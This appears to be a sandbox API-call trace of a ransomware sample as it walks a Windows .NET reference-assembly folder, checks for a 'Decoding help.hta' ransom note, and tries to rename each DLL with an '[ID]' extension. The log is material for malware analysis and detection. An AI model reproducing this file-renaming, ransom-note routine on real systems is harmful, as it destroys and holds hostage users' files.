[0058.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Luna.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" [0058.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" [0058.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.087] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x653fb0e, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x653fb0e, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7a4fb7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Royale.dll", cAlternateFileName="")) returned 1 [0058.087] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.087] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.087] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.087] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Royale.dll") returned -1 [0058.087] lstrlenW (lpString="PresentationFramework.Royale.dll") returned 32 [0058.087] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.087] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.087] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Royale.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" [0058.087] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" [0058.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.087] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa10bdda, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xaa10bdda, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xaa262a3d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x82000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReachFramework.dll", cAlternateFileName="")) returned 1 [0058.087] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.087] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.087] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.088] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ReachFramework.dll") returned -1 [0058.088] lstrlenW (lpString="ReachFramework.dll") returned 18 [0058.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.088] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="ReachFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" [0058.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" [0058.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.088] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0058.088] lstrcmpW (lpString1=".", lpString2="RedistList") returned -1 [0058.088] lstrcmpW (lpString1="..", lpString2="RedistList") returned -1 [0058.088] lstrcmpiW (lpString1="windows", lpString2="RedistList") returned 1 [0058.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.088] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="RedistList" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0058.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0058.088] GlobalMemoryStatus (in: lpBuffer=0x1781fd10 | out: lpBuffer=0x1781fd10) [0058.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5eb8070, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0058.089] CloseHandle (hObject=0x718) returned 1 [0058.089] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SubsetList", cAlternateFileName="SUBSET~1")) returned 1 [0058.089] lstrcmpW (lpString1=".", lpString2="SubsetList") returned -1 [0058.089] lstrcmpW (lpString1="..", lpString2="SubsetList") returned -1 [0058.089] lstrcmpiW (lpString1="windows", lpString2="SubsetList") returned 1 [0058.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.089] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="SubsetList" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList" [0058.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*" [0058.090] GlobalMemoryStatus (in: lpBuffer=0x1781fd10 | out: lpBuffer=0x1781fd10) [0058.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d76bc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0058.090] CloseHandle (hObject=0x718) returned 1 [0058.090] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46093ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb46093ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb46093ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0058.091] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.091] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.091] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IdentityModel.dll") returned -1 [0058.091] lstrlenW (lpString="System.IdentityModel.dll") returned 24 [0058.091] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.091] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IdentityModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" [0058.091] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" [0058.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.091] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46093ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb46093ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb46093ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.Selectors.dll", cAlternateFileName="")) returned 1 [0058.091] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.091] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.092] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IdentityModel.Selectors.dll") returned -1 [0058.092] lstrlenW (lpString="System.IdentityModel.Selectors.dll") returned 34 [0058.092] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.092] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.092] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.092] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IdentityModel.Selectors.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" [0058.092] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" [0058.092] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.092] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a94654c, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x1a94654c, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x5c12c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.Log.dll", cAlternateFileName="")) returned 1 [0058.092] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.092] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.092] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.092] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IO.Log.dll") returned -1 [0058.092] lstrlenW (lpString="System.IO.Log.dll") returned 17 [0058.092] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.092] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.092] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IO.Log.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll") 